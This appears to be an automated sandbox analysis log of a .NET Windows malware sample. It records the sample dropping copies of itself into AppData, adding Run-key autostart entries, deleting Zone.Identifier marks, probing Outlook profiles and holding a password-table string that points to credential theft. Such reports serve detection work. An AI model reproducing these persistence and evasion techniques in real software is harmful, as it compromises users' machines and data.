                Source: Vlrvln.exe, 0000000F.00000002.578941562.0000000003119000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PSFBGrvmxy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4748:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5100:120:WilError_01
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: PSFBGrvmxy.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: PSFBGrvmxy.exeStatic file information: File size 1824768 > 1048576
                Source: PSFBGrvmxy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PSFBGrvmxy.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1bce00
                Source: PSFBGrvmxy.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_058A7140 pushfd ; ret 3_2_058A7141
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_058A80E2 push eax; iretd 3_2_058A80E9
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_069FD3DF push es; ret 3_2_069FD3E0
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to dropped file
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeJump to dropped file

                Boot Survival

                barindex
                Creates multiple autostart registry keys
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VlrvlnJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VlrvlnJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VlrvlnJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
